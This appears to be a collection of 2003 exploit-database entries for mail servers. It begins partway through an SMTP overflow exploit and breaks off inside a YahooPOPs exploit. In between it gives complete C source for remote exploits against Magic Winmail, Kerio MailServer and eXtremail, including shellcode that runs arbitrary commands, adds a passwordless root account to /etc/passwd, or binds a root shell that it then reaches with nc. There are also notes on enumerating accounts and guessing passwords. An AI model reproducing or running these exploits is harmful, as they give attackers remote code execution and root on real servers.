for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
printf("\n");
}
void printresponse(char *a) {
printf("%s\n",a);
}
void writesocket(int sock, char *buf) {
if (send(sock,buf,strlen(buf),0) <= 0) {
printf("Error writing to socket\n");
exit(0);
}
printresponse(buf);
}
void readsocket(int sock, int response) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
if (response != atol(temp)) {
printf("Bad response: %s\n",temp);
exit(0);
}
else printresponse(temp);
}
void relay(int sock) {
while(1) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Server vulnerable (crashed)\n");
exit(0);
}
printresponse(temp);
if (atol(temp) == 553) {
printf("Not exploitable\n");
exit(0);
}
}
}
int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,j,m;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
if (argc <= 2) {
printf("%s <target ip> <target number>\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[2]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
header();
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
printf("Resolving address... ");
fflush(stdout);
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
printf("Connected\n");
printf("Sending exploit... \n");
fflush(stdout);
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: <[email protected]>\r\n");
readsocket(sock,250);
memset(buf,0,sizeof(buf));
strcpy(buf,"RCPT TO: ");
p=buf+strlen(buf);
for (i=1,j=0,m=0;i<1242;i++) {
if (!(i%256)) {
*p++=';';
j++;
}
else {
if (j < 4) *p++='A';
else {
if (m == archs[target].pos) pos=p;
//if (m > archs[target].pos) *p++='B'; else
*p++='A';
m++;
}
}
}
if (pos) memcpy(pos,(char*)&archs[target].addr,4);
*p++=';';
for (i=0;i<archs[target].apos;i++) {
*p++='\\';
*p++=0xff;
}
strcat(buf,"\r\n");
writesocket(sock,buf);
relay(sock);
}
// [2003-04-30]
25 Winmail Mail Server 2.3 Remote Format String Exploit
/************************************************** ****************
* Magic Winmail Server 2.3(Build 0402)
* Remote Format string exploit.
************************************************** ****************
* Coded by ThreaT.
*
*
* This one take advantage of a format bug in the
* >>> SMTP protocol <<< (not pop3) for execute
* a malicious command on a vulnerable system
*
* usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
* + The command to execute cannot exceed 90 characters +
*
* compile : cl.exe mwmxploit.c /w
*
************************************************** ****************
*/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
void main (int argc, char *argv[])
{
SOCKET sock;
char buffer[1000];
int i;
// ecrasement d'un saved EIP grâce aux caractères de format
char vuln[] =
"\xec\xfc\x66\x01%x%x"
"\xed\xfc\x66\x01%x%x"
"\xee\xfc\x66\x01"
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
"%97x%n%105x%hn"
/*
This is my specific shellcode for execute a command
over the Magic Winmail process.
This one can contain null bytes, enjoy ! :)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00 Call dword ptr [004D01AC]
Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00 Call dword ptr [004D0198]
Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
//////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\
: EB50 jmp 00401058
: 5E pop esi
: 8BEC mov ebp, esp
: 83EC28 sub esp, 00000028 // je cree un stack
: C745D84B65726E mov [ebp-28], 6E72654B
: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'
: C745E000000000 mov [ebp-20], 00000000
: C745E457696E45 mov [ebp-1C], 456E6957
: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'
// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin
// de 4 caractères de plus pour la commande à executer
: C645EB00 mov [ebp-15], 00
: BAAC014D00 mov edx, 004D01AC
: 8D45D8 lea eax, dword ptr [ebp-28]
: 50 push eax
: FF12 call dword ptr [edx] // eax = GetModuleHandle ("Kernel32");
: 8D5DE4 lea ebx, dword ptr [ebp-1C]
: 53 push ebx
: 50 push eax
: BAEC004D00 mov edx, 004D00EC
: FF12 call dword ptr [edx] // GetProcAdress (eax, "WinExec");
: 6A01 push 00000001 // 1 = SW_SHOW, 0 = SW_HIDE
: 56 push esi
: FFD0 call eax // WinExec (argv[2], SW_SHOW)
: BA98014D00 mov edx, 004D0198
: FF12 call dword ptr [edx] // ExitProcess ();
: E8ABFFFFFF call 00401008
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////
*/
// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)
"\x00\x90\x90\x90\x90" // sa, c'est pour bien coller
"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x 65\x72\x6E\xC7"
"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x 00\xC7\x45\xE4"
"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x 45\xEB\x00\xBA"
"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\x E4\x53\x50\xBA"
"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x 98\x01\x4D\x00"
"\xFF\x12\xE8\xAB\xFF\xFF\xFF";
SOCKADDR_IN sin;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
//
printf ("* #################################### *\n"
" Magic Winmail Server 2.3(Build 0402)\n"
" Remote format string exploit !\n"
"* #################################### *\n"
" Coded By ThreaT -> ThreaT\n\n");
if (argc < 3 || strlen (argv[2]) > 90)
{
printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
" + The command to execute cannot exceed 90 characters +\n");
ExitProcess (0);
}
if ( WSAStartup(wVersionRequested, &wsadata) )
{
printf ("Erreur d'initialisation winsock !\n");
ExitProcess (1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Erreur : L'adresse IP de la victime est incorrect !\n");
ExitProcess (2);
}
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
sock = socket (AF_INET, SOCK_STREAM, 0);
if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("erreur : connexion impossible !\n");
ExitProcess (3);
}
recv (sock,buffer,1000,0);
printf ("ok\n-> %s\nsending exploit code...",buffer);
send (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode
send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande
send (sock, "\r\n", 2, 0); // validation
recv (sock,buffer,1000,0); // remote crash :)
puts ("ok");
}
/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
*/
/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30 1548 Connect from 127.0.0.1
0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25
0x25783020 0x2078382e 0x2e257830
*/
// [2003-06-11]
25 Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit
/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */
/* ========================================= */
/* By B-r00t */
/* */
/* In response to the Kerio Mailserver vulnerabilities */
/* discovered by David F.Madrid. */
/* */
/* Although this exploit requires valid authentication */
/* details, it is possible to use 'RCPT TO' to enumerate */
/* valid accounts 'A La Sendmail' as shown below: - */
/*
$ telnet 192.168.0.10 25
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
mail from: [email protected]
250 2.1.0 Sender <[email protected]> ok
rcpt to: [email protected]
550 5.1.1 Mailbox <[email protected]> does not exist
rcpt to:[email protected]
250 2.1.5 Recipient <[email protected]> ok (local) << default
admin account.
rcpt to: [email protected]
250 2.1.5 Recipient <[email protected]> ok (local) << user fred
seems to exist.
rset
250 2.0.0 Reset state
quit
221 2.0.0 SMTP closing connection
Connection closed by foreign host.
*/
/* Using a dictionary attack to obtain a large number */
/* of accounts in conjunction with users natural */
/* stupidity for using easy to guess passwords should */
/* yield at least one valid account. */
/* */
/* Once an account has been cracked, login to the */
/* Kerio webmail service and record the 'userid' */
/* cookie value: - */
/*
$ lynx 192.168.0.10
Username: fred___________
Password: _______________
OK
192.168.0.10 cookie: userid=7dc1700017e708a5 Allow? (Y/N/Always/neVer)
*/
/* Accept the cookie 'Y' to ensure you are fully */
/* logged in to the Kerio webmail service. */
/*
[br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5
Payload: 408 / 408 bytes
Wall0p! ... !!!
If successful a UID 0 Account 'keriohacker'
has been appended to /etc/passwd. Use 'ssh'
or 'su' (if local) to get r00t! ....
[br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
Last login: Thu Jun 5 08:21:30 2003
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05# tail -1 /etc/passwd
keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
sh-2.05#
*SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
Alternative: Recode the shellcode to add normal user!
That's All Folks ...
ENJOY!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define DEST_PORT 80
int main ( int argc, char *argv[] )
{
int socketfd, bytes;
struct sockaddr_in dest_addr;
char buffer[700];
// char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB
char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 +
kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
char *ptr = buffer;
char req[] = "GET /list?folder=~";
char cr[] = "\x0D\x0A";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
// Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
"\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x 88\x46\x34"
"\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x 46\x41\x66"
"\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x 5e\x0c\x89"
"\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\x e4\x01\xcd"
"\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x 80\xea\xca"
"\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x e8\xa6\xff"
"\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x 64\x58\x6b"
"\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x 30\x3a\x30"
"\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x 59\x33\x72"
"\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x 70\x3a\x58"
"\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41"
"\x90\x90\x90\x90\x90\x90";
memset (buffer, '\0', sizeof (buffer));
if (argc < 3) {
printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n",
argv[0]);
exit (1);
}
printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode));
strcpy (buffer, req);
strcat (buffer, shellcode);
strcat (buffer, ret);
strcat (buffer, ret);
strcat (buffer, " HTTP/1.0");
strcat (buffer, cr);
strcat (buffer, "Cookie: ");
strcat (buffer, argv[2]);
strcat (buffer, cr);
strcat (buffer, cr);
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket");
exit (1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
perror("inet_aton problems");
exit (2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("connect failed");
close (socketfd);
exit (3);
}
bytes = (send (socketfd, ptr, strlen(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
close (socketfd);
printf ("\nWall0p! ... !!!\n\n");
printf ("\nIf successful a UID 0 Account 'keriohacker'");
printf ("\nhas been appended to /etc/passwd. Use 'ssh'");
printf ("\nor 'su' (if local) to get r00t! ....\n\n");
}
// [2003-06-27]
25 Linux eXtremail 1.5.x Remote Format Strings Exploit
/************************************************** **************/
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
/* */
/* */
/* By B-r00t - 02/07/2003 */
/* */
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
/* Linux eXtremail-1.5-5 => VULNERABLE */
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
/* r00tshell to port 36864 on the target eXtremail server. */
/* */
/************************************************** **************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define EXPLOIT "eXtreme"
#define DEST_PORT 25
// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);
// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
struct {
char *systemtype;
unsigned long got;
unsigned long ret;
int pad;
int buf;
int pos;
} targets[] = {
// Confirmed targets tested by B-r00t.
{ "RedHat 7.2 eXtremail V1.5 release 5
(eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 5
(eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8,
0xbefff1d4, 1, 266, 44},
{ "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266,
44},
{ 0 }
};
int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";
printf ("\n%s by B-r00t <[email protected]>. (c) 2003\n",
EXPLOIT);
if (argc < 3)
usage ();
choice = atoi(argv[2]);
if (choice < 0 || choice > 3)
usage ();
setenv (TARGET, argv[1], 1);
get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}
void usage (void)
{
int loop;
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
for (loop = 0; targets[loop].systemtype; loop++)
printf ("\n%d\t%s", loop, targets[loop].systemtype);
printf ("\n\nOn success a r00tshell will be spawned on port
36864.\n\n");
exit (-1);
}
int get_sock (char *host)
{
struct sockaddr_in dest_addr;
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket Error!\n");
exit (-1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
perror("inet_aton problems\n");
exit (-2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("Connect failed!\n");
close (socketfd);
exit (-3);
}
printf ("\n\nConnected to %s\n", host);
}
int send_sock (char *stuff)
{
int bytes;
bytes = (send (socketfd, stuff, strlen(stuff), 0));
if (bytes == -1) {
perror("Send error");
close (socketfd);
exit(4);
}
printf ("Send:\t%s", stuff);
return bytes;
}
int read_sock (void)
{
int bytes;
char buffer[200];
char *ptr;
ptr = buffer;
memset (buffer, '\0', sizeof(buffer));
bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
printf ("Recv:\t%s", buffer);
return bytes;
}
int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];
RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);
GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);
// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;
// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;
//1st GOT addy
strncat (buf, g, 4);
//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;
for (loop=0; loop<4; loop++) {
if (r[loop] > sofar) {
w[loop] = r[loop]-sofar;
} else
if (r[loop] == sofar) {
w[loop] = 0;
}else
if (r[loop] < sofar) {
w[loop] = (256-sofar)+r[loop];
}
sofar = sofar+w[loop];
}
bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));
// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);
// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}
// [2003-07-02]
25 YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit
/*
YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com
Bind a shellcode to the port 101.
Thanx to Behrang Fouladi([email protected]) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work
Instead of to move like you Behrang EBX to ESP after overwritting EIP,
I found out that only jumping to EBX is needed because our crafted payload
starts at EBX.
The exploit is tested working on Win2K SP4 and WinXP SP1, and it should works
also on NT4 and 2003 as the shellcode is designed for.
The jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update,
this is already "universal".
This exploit can't overflow the port 110 (POP3), not enough space in the buffer to add a bind/reverse shell
maybe enough to spawn only one as the well know KaHT.
If you want to try on POP3, you should request more than 180 bytes to overwrite EAX and ECX
Maybe in a v0.2, I will add it , anyway check http://DFind.kd-team.com regulary.
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
char scode[] = //BIND shellcode port 101, thanx HDMoore.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[1024];
char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
char recvbuf[100];
int ip=htonl(inet_addr(argv[1])), port, size, x;
if (argc==3){port=atoi(argv[2]);}
else port=25;
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, checking the server..."<<endl;
Sleep(1000);recv(s,recvbuf,200,0);
if (strstr(recvbuf,"OK POP3 YahooPOPs")){cout<<"[+] this is not the POP3 port but the SMTP port that you should use."<<endl;return -1;}
